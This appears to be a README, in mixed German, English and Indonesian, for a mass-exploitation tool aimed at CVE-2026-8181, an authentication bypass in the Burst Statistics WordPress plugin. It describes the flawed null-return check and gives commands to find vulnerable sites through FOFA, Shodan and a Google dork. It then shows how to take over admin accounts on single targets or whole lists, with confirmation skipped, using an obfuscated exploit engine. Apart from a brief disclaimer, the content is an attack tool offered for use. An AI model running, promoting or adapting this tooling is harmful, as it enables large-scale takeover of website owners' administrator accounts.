
CVE-2026-8181 — Burst Statistics WordPress plugin Authentication Bypass (CVSS 9.8) to Admin Account Takeover. Mass scanner with FOFA/Shodan integration and modern GUI.
CVSS 9.8 (Kritisch) — Authentifizierungs-Bypass zur Übernahme des Admin-Kontos
CVE-2026-8181 ist eine Authentifizierungs-Bypass-Schwachstelle im WordPress-Plugin Burst Statistics in den Versionen 3.4.0 bis 3.4.1.1. Dieses Plugin wird von 200.000+ WordPress-Websites als datenschutzfreundliche Alternative zu Google Analytics eingesetzt.
Diese Schwachstelle ermöglicht es einem nicht authentifizierten Angreifer, der den Admin-Benutzernamen kennt:
Die Funktion is_mainwp_authenticated() in class-mainwp-proxy.php validiert den Rückgabewert von wp_authenticate_application_password() falsch. Die Funktion gibt null (nicht WP_Error) zurück, wenn sie außerhalb des REST-API-Kontexts aufgerufen wird, und der Code prüft nur is_wp_error(). Da null kein WP_Error ist, wird die Authentifizierung als erfolgreich betrachtet.
# 1. Clone repository
git clone https://github.com/YOUR_USERNAME/CVE-2026-8181.git
cd CVE-2026-8181
# 2. Install dependencies
py -3.11 -m pip install -r requirements.txt
# 3. Siapkan .env (untuk scan via FOFA / Shodan)
echo [email protected] > .env
echo FOFA_KEY=your_fofa_key >> .env
echo SHODAN_KEY=your_shodan_key >> .env
# 4. Jalankan (pilih salah satu):
# Modern GUI (recommended)
py -3.11 gui_modern.py
# Atau double-click run.bat
run.bat
# Atau CLI langsung exploit satu target
py -3.11 CVE-2026-8181.py -t https://target.com -u admin --no-confirm
# Atau exploit massal dari file
py -3.11 CVE-2026-8181.py -l targets_output.txt -u admin --no-confirm
# Atau scan target dulu, baru exploit
py -3.11 finder.py --file list.txt
py -3.11 CVE-2026-8181.py -l targets_output.txt -u admin --no-confirm
Doppelklicken Sie auf run.bat oder führen Sie Folgendes aus:
py -3.11 gui_modern.py

Moderne GUI von CVE-2026-8181 mit 3 Tabs
Im Tab Scan: Zielquelle auswählen (FOFA/Shodan aus .env, Datei oder manuell) → auf SCAN TARGETS klicken Im Tab Exploit: Admin-Benutzernamen eingeben → auf EXPLOIT klicken

Das Tool findet verwundbare Ziele und ist bereit für den Exploit
Wenn der Exploit erfolgreich ist, erhält der Angreifer vollen Zugriff als Administrator:

WordPress-Admin-Dashboard nach erfolgreichem Exploit
CVE-2026-8181/
├── CVE-2026-8181.py # Main exploit engine (PyArmor)
├── gui_modern.py # Modern GUI wrapper (recommended)
├── finder.py # Target scanner (FOFA / Shodan / File)
├── run.bat # One-click launcher
├── requirements.txt # Python dependencies
├── .env # API keys (gitignored)
├── .gitignore
├── Dork.txt # Google Dork
├── pyarmor_runtime_000000/ # PyArmor runtime (Python 3.11)
├── system/ # Source modules (obfuscated)
└── img/ # Screenshots tutorial
├── 1.png
├── 2.png
└── 3.png
.env einfügen.env einfügenNur für Bildungszwecke und autorisierte Penetrationstests. Die unbefugte Nutzung auf Systemen, die nicht Ihnen gehören, ist illegal. Verwenden Sie es nur auf Websites, die Sie besitzen oder für die Sie eine schriftliche Genehmigung haben.
| Flag | Beschreibung |
|---|
-t, --target | Ziel-URL (einzeln) |
-l, --list | Datei mit Zielliste |
-u, --username | Admin-Benutzername (Standard: admin) |
-T, --threads | Anzahl der Threads (Standard: 10) |
-o, --output | Ausgabedatei mit Ergebnissen |
-v, --verbose | Debug-Ausgabe |
--timeout | Request-Timeout (Sekunden) |
--no-confirm | Bestätigung überspringen |